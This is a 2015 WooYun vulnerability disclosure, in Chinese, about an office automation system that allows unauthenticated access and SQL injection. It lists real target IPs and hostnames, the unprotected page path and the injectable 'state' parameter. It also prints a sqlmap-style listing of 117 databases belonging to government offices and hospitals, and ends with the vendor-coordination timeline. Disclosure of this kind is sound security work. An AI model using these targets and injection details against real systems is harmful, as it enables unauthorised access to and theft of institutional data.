当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-092462

漏洞标题:某网络办公自动化系统的通杀注入和未授权访问

相关厂商:网络办公自动化系统

漏洞作者: 陆由乙

提交时间:2015-01-21 15:25

修复时间:2015-04-21 15:26

公开时间:2015-04-21 15:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-21: 细节已通知厂商并且等待厂商处理中
2015-01-26: 厂商已经确认,细节仅向厂商公开
2015-01-29: 细节向第三方安全合作伙伴开放
2015-03-22: 细节向核心白帽子及相关领域专家公开
2015-04-01: 细节向普通白帽子公开
2015-04-11: 细节向实习白帽子公开
2015-04-21: 细节向公众公开

简要描述:

你猜猜

详细说明:

案例:
http://218.87.140.106/
http://oa.jxgxedu.gov.cn/
http://59.55.33.137:8010/
http://59.55.33.137:8040/
漏洞说明:
打开后是个登录
但可以直接访问
mainpage/index.html

通用3.jpg


/mainpage/articleflashshow.aspx?flashtypeid=1&maxleng=7&state=1
注入参数state

通用2.jpg

通用1.jpg

通用.jpg


available databases [117]:
[*] eoffice_2011_ayjyj
[*] eoffice_2011_cygtgs
[*] eoffice_2011_cyjyj
[*] eoffice_2011_dnajj
[*] eoffice_2011_dngxj
[*] eoffice_2011_dngyy
[*] eoffice_2011_dnhbj
[*] eoffice_2011_dnjyj
[*] eoffice_2011_dnsfj
[*] eoffice_2011_dntjj
[*] eoffice_2011_dnwsj
[*] eoffice_2011_dnzx
[*] eoffice_2011_dyjyj
[*] eoffice_2011_gxgyy
[*] eoffice_2011_gxwsj
[*] eoffice_2011_gzshgyy
[*] eoffice_2011_gzslyj
[*] eoffice_2011_gzsyj
[*] eoffice_2011_j123
[*] eoffice_2011_jrgs
[*] eoffice_2011_lngyy
[*] eoffice_2011_lnjyj
[*] eoffice_2011_nkjsw
[*] eoffice_2011_qngxj
[*] eoffice_2011_qnjyj2
[*] eoffice_2011_rjgyy
[*] eoffice_2011_scgyy
[*] eoffice_2011_scjyj
[*] eoffice_2011_sygyy
[*] eoffice_2011_syjyj
[*] eoffice_2011_sywsj
[*] eoffice_2011_xfhbj
[*] eoffice_2011_xyjt
[*] eoffice_2012_aygtj
[*] eoffice_2012_cyzfb
[*] eoffice_2012_dngtj
[*] eoffice_2012_dnjsw
[*] eoffice_2012_dnyjj
[*] eoffice_2012_dnytdzc
[*] eoffice_2012_gzkejt
[*] eoffice_2012_hcmzj
[*] eoffice_2012_hcnxs
[*] eoffice_2012_nksnxs
[*] eoffice_2012_qnwsj
[*] eoffice_2012_qnxwxcb
[*] eoffice_2012_scxgyzx
[*] eoffice_2012_scxrmyy
[*] eoffice_2012_xfsyjj
[*] eoffice_2012_xggyy
[*] eoffice_2012_ydsyjj
[*] eoffice_2012_yspt
[*] eoffice_2013_cynxs
[*] eoffice_2013_dnctgs
[*] eoffice_2013_dnlyj
[*] eoffice_2013_dnmzj
[*] eoffice_2013_dnslj
[*] eoffice_2013_dygyy
[*] eoffice_2013_gzswsj
[*] eoffice_2013_gzszxxz
[*] eoffice_2013_hcnlj
[*] eoffice_2013_hcwsj
[*] eoffice_2013_lnhbj
[*] eoffice_2013_ndjyj
[*] eoffice_2013_ndxgdj
[*] eoffice_2013_qnnbj
[*] eoffice_2013_rjnxs
[*] eoffice_2013_scjj
[*] eoffice_2013_sldl
[*] eoffice_2013_xfjyj
[*] eoffice_2013_xyjzgs
[*] eoffice_2014_ayfgj
[*] eoffice_2014_ayjsw
[*] eoffice_2014_ayjyj
[*] eoffice_2014_ayngb
[*] eoffice_2014_aynlj
[*] eoffice_2014_aysbszf
[*] eoffice_2014_ayzzb
[*] eoffice_2014_dacl
[*] eoffice_2014_dncyt
[*] eoffice_2014_gzczgljl
[*] eoffice_2014_gzsdwrmyy
[*] eoffice_2014_gzsgxw
[*] eoffice_2014_hcczj
[*] eoffice_2014_hcfgw
[*] eoffice_2014_hcgxj
[*] eoffice_2014_hclyj
[*] eoffice_2014_hcslga
[*] eoffice_2014_hndc
[*] eoffice_2014_lngxj
[*] eoffice_2014_qnsfj
[*] eoffice_2014_qnslj
[*] eoffice_2014_syngb
[*] eoffice_2014_synxs
[*] eoffice_2014_syzzb
[*] eoffice_2014_xfnxs
[*] eoffice_2014_xfxzf
[*] eoffice_2014_xgwsj
[*] eoffice_2014_xlwy
[*] eoffice_2014_ydlyj
[*] eoffice_2015_ayybj
[*] eoffice_2015_hcgyy
[*] eoffice_2015_hclwzfdd
[*] eoffice_2015_lngxz
[*] eoffice_2015_xfkgj
[*] eoffice_2015_xfswj
[*] eoffice_2015_xfzfw
[*] eoffice_Noa_WebUrlRewrite
[*] eoffice_Sms_Manage
[*] eoffice_standard_gzycjgxx
[*] master
[*] model
[*] msdb
[*] ocdc_xfxzf
[*] OCDC_yspt
[*] professional_gzndgyy
[*] tempdb
[*] test


漏洞证明:

as20150117210649.jpg

修复方案:

过滤

版权声明:转载请注明来源 陆由乙@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-01-26 09:12

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给江西分中心,由江西分中心后续协调网站管理单位处置。

最新状态:

暂无


漏洞评价:

评论